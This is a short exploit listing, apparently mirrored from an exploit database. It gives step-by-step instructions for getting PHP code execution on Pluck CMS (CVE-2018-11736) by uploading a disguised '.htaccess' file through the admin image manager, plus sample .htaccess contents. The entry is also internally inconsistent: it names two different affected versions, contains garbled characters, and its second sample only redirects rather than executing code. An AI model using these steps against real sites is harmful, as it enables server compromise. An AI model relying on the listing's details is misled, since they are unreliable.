Share
## https://sploitus.com/exploit?id=PACKETSTORM:212598
# Exploit Title: Pluck 4.7.7-dev2 -  PHP Code Execution 
    # Date: 2024-10-26
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/pluck-cms/pluck
    # Software Link: https://github.com/pluck-cms/pluck
    # Version: 4.74-dev5
    # Tested on: Ubuntu Windows
    # CVE : CVE-2018-11736
    
    PoC:
    1๏ผ‰
    1. Log in to the Pluck admin panel.\n
    2. Navigate to the 'Manage Images' section at http://pluck1/admin.php?action=images.\n
    3. Upload a file named '.htaccess' with the content-type 'image/jpeg' containing 'AddType application/x-httpd-php .jpg'.\n
    4. Access the target directory (e.g., http://pluck1/images/test.jpg) to execute PHP code with the .jpg extension.
    
    2)
    .htaccess content: 
    RewriteEngine On
    RewriteRule .* http://www.baidu.com/ [R,L]